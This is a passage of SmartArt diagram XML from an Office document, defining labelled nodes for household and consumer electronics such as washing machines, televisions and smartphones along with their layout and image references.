      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Washing Machine</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ACD04315-9850-4DA0-A1D6-C4B38EBE10B7}" type="parTrans" cxnId="{F3BF33E7-C059-4E04-998C-3D088ED3A051}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37AB3121-8874-4DF0-82C2-A88A09059BB6}" type="sibTrans" cxnId="{F3BF33E7-C059-4E04-998C-3D088ED3A051}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC5E4A6A-F7E0-47AE-A59B-DED1DA8DDFDA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Microwave Oven</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69F0ABE4-D077-40A4-A0BF-8F2F859C2E74}" type="parTrans" cxnId="{760CE729-10F6-48FC-ACEE-AA32AC154E05}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{452F1B89-BAAD-41CB-8C24-50E4E42FC03E}" type="sibTrans" cxnId="{760CE729-10F6-48FC-ACEE-AA32AC154E05}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B26A55BC-00BB-43C3-A088-AF23A6A1D7B2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Set Top Box</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F5AA162-5F71-4223-9106-39D74B4BE726}" type="parTrans" cxnId="{53F5E73E-1B0B-4150-8BC4-3B97E3819D75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25DE0E6A-17A4-4CB5-9F73-3BB9D3236754}" type="sibTrans" cxnId="{53F5E73E-1B0B-4150-8BC4-3B97E3819D75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74F9B7B6-6CDB-4C72-BCFB-3F421429F32D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Television Set</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F469FECD-677F-4ADE-A013-14B8B5347B7B}" type="parTrans" cxnId="{28CEEAE5-B50A-4C55-AA3A-FF32065FE3EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E844B599-F40D-496C-ABA5-A4089D2E19A4}" type="sibTrans" cxnId="{28CEEAE5-B50A-4C55-AA3A-FF32065FE3EB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD758683-FE41-43B0-943E-11555910705C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Smartphone</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11810766-9540-4779-86CA-0180A3CFB95A}" type="parTrans" cxnId="{B054EC09-F184-4149-B12C-A0D4DDA6676A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6086B907-0DE7-4C19-84EA-10A195D72CEF}" type="sibTrans" cxnId="{B054EC09-F184-4149-B12C-A0D4DDA6676A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7911FB20-3B48-4AC7-A5CE-2F8E2C307916}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Digital Camera</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED22D04B-0BD2-41E0-9E42-060FC2B9439E}" type="parTrans" cxnId="{9BE658D7-8223-405E-A251-858DF6E61E09}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8EE78002-CC4F-4639-966D-422B14CF5CE2}" type="sibTrans" cxnId="{9BE658D7-8223-405E-A251-858DF6E61E09}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EC999C4-DB80-43DB-BFD1-52EBB5F05FF5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Navigation System</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5CD0DCF-853C-449D-AA40-9DF568F67F31}" type="parTrans" cxnId="{36BBB619-BF11-40BD-AEE7-959DA10BF1A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B9BFF97-E3AE-41F4-BCE8-4E0F27F47C8B}" type="sibTrans" cxnId="{36BBB619-BF11-40BD-AEE7-959DA10BF1A3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71573598-1FDD-48E8-BDFF-3AD2D57F3630}" type="pres">
      <dgm:prSet presAssocID="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54FFF4D3-EB7D-40D8-B4C1-BDC4542D6DD6}" type="pres">
      <dgm:prSet presAssocID="{8DECE47F-1B2B-4B7B-B891-316C50DC087F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC9CD42D-199A-4F2B-BF55-D9D20D9D5AED}" type="pres">
      <dgm:prSet presAssocID="{8DECE47F-1B2B-4B7B-B891-316C50DC087F}" presName="pictRect" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{FADCFDBC-021E-4227-855F-C7D0609FCF4E}" type="pres">
      <dgm:prSet presAssocID="{8DECE47F-1B2B-4B7B-B891-316C50DC087F}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{251ED3D0-5900-4E60-9820-C5D7A7A45CDD}" type="pres">
      <dgm:prSet presAssocID="{90187010-5C55-4B67-B80D-C519D715BF8D}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59D37D6C-6A09-43A9-A38E-9720E54A258E}" type="pres">
      <dgm:prSet presAssocID="{1A1B9150-FB99-4D58-9C04-298871F8F847}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB748C07-C8C4-4169-8DA3-EFF334AE3495}" type="pres">
      <dgm:prSet presAssocID="{1A1B9150-FB99-4D58-9C04-298871F8F847}" presName="pictRect" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{D0E709A1-CB34-4D95-BAC8-EA65E5DCCB3D}" type="pres">
      <dgm:prSet presAssocID="{1A1B9150-FB99-4D58-9C04-298871F8F847}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EED40010-D4F0-48B6-BC8D-BE21B585AFAC}" type="pres">
      <dgm:prSet presAssocID="{4E869DAF-8703-4C25-94D3-0930A9794A7E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED665195-FFAF-4BB4-9A77-2F0333827834}" type="pres">
      <dgm:prSet presAssocID="{4C043118-3FFC-4561-ABDB-394C2E6D2EE1}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{43103719-51A3-4C66-B4E4-0BA77BA54AB8}" type="pres">
      <dgm:prSet presAssocID="{4C043118-3FFC-4561-ABDB-394C2E6D2EE1}" presName="pictRect" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{C32989C6-D115-43D0-9950-00E497DACD50}" type="pres">
      <dgm:prSet presAssocID="{4C043118-3FFC-4561-ABDB-394C2E6D2EE1}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D90D3C31-58CA-46AB-918B-A47AD2026F07}" type="pres">
      <dgm:prSet presAssocID="{E42098A2-EADA-4E78-929E-DC0C8CE0757F}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B381A79F-588A-44E8-905E-F2C11A62AF4D}" type="pres">
      <dgm:prSet presAssocID="{0899F5CA-668C-44CC-9ED2-0612BBC18D2D}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71180179-C1F2-4F7F-988E-1917E917F17B}" type="pres">
      <dgm:prSet presAssocID="{0899F5CA-668C-44CC-9ED2-0612BBC18D2D}" presName="pictRect" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{47403984-B2C0-489B-AFF6-1747887610DA}" type="pres">
      <dgm:prSet presAssocID="{0899F5CA-668C-44CC-9ED2-0612BBC18D2D}" presName="textRect" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAE70887-5032-4496-883A-3CA18CBB7E5E}" type="pres">
      <dgm:prSet presAssocID="{98AE27B2-1399-482C-AA42-384B5CB37CD1}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{091AC157-A01D-4377-9E8F-6669AFE8DC0D}" type="pres">
      <dgm:prSet presAssocID="{9275E04B-F0EC-4EC9-9417-C462CC072C77}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{552A8E5D-EC78-4EEC-A71D-EC9262974B30}" type="pres">
      <dgm:prSet presAssocID="{9275E04B-F0EC-4EC9-9417-C462CC072C77}" presName="pictRect" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{FC18F91E-B9E0-4E6D-80D2-6952FDA68C9C}" type="pres">
      <dgm:prSet presAssocID="{9275E04B-F0EC-4EC9-9417-C462CC072C77}" presName="textRect" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C072A7D-089D-425E-B90E-D8D0017C814D}" type="pres">
      <dgm:prSet presAssocID="{A022C8A3-3CCF-4507-9EE2-CE4C920B434A}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D213EC9C-2DF9-48C2-852E-6A72C1C3300C}" type="pres">
      <dgm:prSet presAssocID="{D571FBA1-C111-487D-A1CC-3ABA9B62D5B9}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3DD1124B-076A-43A2-B3A2-3E3AB0F9996A}" type="pres">
      <dgm:prSet presAssocID="{D571FBA1-C111-487D-A1CC-3ABA9B62D5B9}" presName="pictRect" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{CAE4AF96-B854-40BF-8F2D-625D902FFDB3}" type="pres">
      <dgm:prSet presAssocID="{D571FBA1-C111-487D-A1CC-3ABA9B62D5B9}" presName="textRect" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0E14DE4-FB82-4809-90AD-270F00A25CBF}" type="pres">
      <dgm:prSet presAssocID="{58D488A8-CFCF-4486-BDF8-D94A8FD936D5}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9ADE3FD-3BCA-487E-9DAB-A872A4EA2490}" type="pres">
      <dgm:prSet presAssocID="{2A699AA5-3DA2-4A80-AA12-ADD62C4F8C36}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AF24C597-9CC2-4EFE-923D-12C6039D9EB9}" type="pres">
      <dgm:prSet presAssocID="{2A699AA5-3DA2-4A80-AA12-ADD62C4F8C36}" presName="pictRect" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{77521A74-4CD7-4F98-95C5-D711CE387FFD}" type="pres">
      <dgm:prSet presAssocID="{2A699AA5-3DA2-4A80-AA12-ADD62C4F8C36}" presName="textRect" presStyleLbl="revTx" presStyleIdx="6" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{648AB171-FA8A-4AE8-B132-3D7AB46EEC56}" type="pres">
      <dgm:prSet presAssocID="{DA02151B-CCF0-4D5A-8CED-76CEC1D064DB}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{427D901C-005C-4DFA-AE5A-B927BD84E2D3}" type="pres">
      <dgm:prSet presAssocID="{60AB827D-5295-4177-BF64-99000A240B5F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{700BB1AE-6534-4A5C-938F-C2132C91CDA2}" type="pres">
      <dgm:prSet presAssocID="{60AB827D-5295-4177-BF64-99000A240B5F}" presName="pictRect" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{D1D25A88-3F4A-4DA9-9873-F761B2A4B335}" type="pres">
      <dgm:prSet presAssocID="{60AB827D-5295-4177-BF64-99000A240B5F}" presName="textRect" presStyleLbl="revTx" presStyleIdx="7" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B405CC-6054-4283-B10A-661E184AFFD3}" type="pres">
      <dgm:prSet presAssocID="{36F281B0-F791-4991-8164-D7924CBABE59}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78ED4D95-8743-43E6-8687-FE4D42BABEA4}" type="pres">
      <dgm:prSet presAssocID="{4FA5E191-71CB-4DA0-828B-EE161F632C3B}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5975398-798C-4FF3-993C-982AB1132C33}" type="pres">
      <dgm:prSet presAssocID="{4FA5E191-71CB-4DA0-828B-EE161F632C3B}" presName="pictRect" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{CAA34D51-995F-4EF7-A9B1-E05CD0C2B260}" type="pres">
      <dgm:prSet presAssocID="{4FA5E191-71CB-4DA0-828B-EE161F632C3B}" presName="textRect" presStyleLbl="revTx" presStyleIdx="8" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59F07E68-F287-450D-9C96-EF2128FC3494}" type="pres">
      <dgm:prSet presAssocID="{872D6295-D746-4DBA-BB2B-E37798932101}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBDA2904-3300-4B51-BD4E-6CED0F2E91C2}" type="pres">
      <dgm:prSet presAssocID="{9584D754-28D6-4FDA-ADF3-CA332D8340FB}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FC4F9896-E787-45DE-80F9-7D2696837477}" type="pres">
      <dgm:prSet presAssocID="{9584D754-28D6-4FDA-ADF3-CA332D8340FB}" presName="pictRect" presStyleLbl="node1" presStyleIdx="9" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{B4DA130B-57E1-4C19-BD92-98E000732052}" type="pres">
      <dgm:prSet presAssocID="{9584D754-28D6-4FDA-ADF3-CA332D8340FB}" presName="textRect" presStyleLbl="revTx" presStyleIdx="9" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D9A0C76D-8AA7-4D94-B576-A5A92F5E8788}" type="pres">
      <dgm:prSet presAssocID="{C4BF8CBA-1A3F-41B3-9E8D-0AFD5F2FEAB1}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83AC2EF3-9F3C-4CE6-9A09-BFE6F7BC3FB4}" type="pres">
      <dgm:prSet presAssocID="{C6562DFE-B211-4253-BE95-BF2E3337D88D}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CC8F0DA6-554D-4D24-9669-238166AC7F39}" type="pres">
      <dgm:prSet presAssocID="{C6562DFE-B211-4253-BE95-BF2E3337D88D}" presName="pictRect" presStyleLbl="node1" presStyleIdx="10" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{6AC9A96A-7C34-42B9-9BB0-D842A445330B}" type="pres">
      <dgm:prSet presAssocID="{C6562DFE-B211-4253-BE95-BF2E3337D88D}" presName="textRect" presStyleLbl="revTx" presStyleIdx="10" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{775EF604-DC7C-47B2-883E-FAFAFE54DA79}" type="pres">
      <dgm:prSet presAssocID="{C9BC2EA4-0955-47D8-856E-5D8C95308B86}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
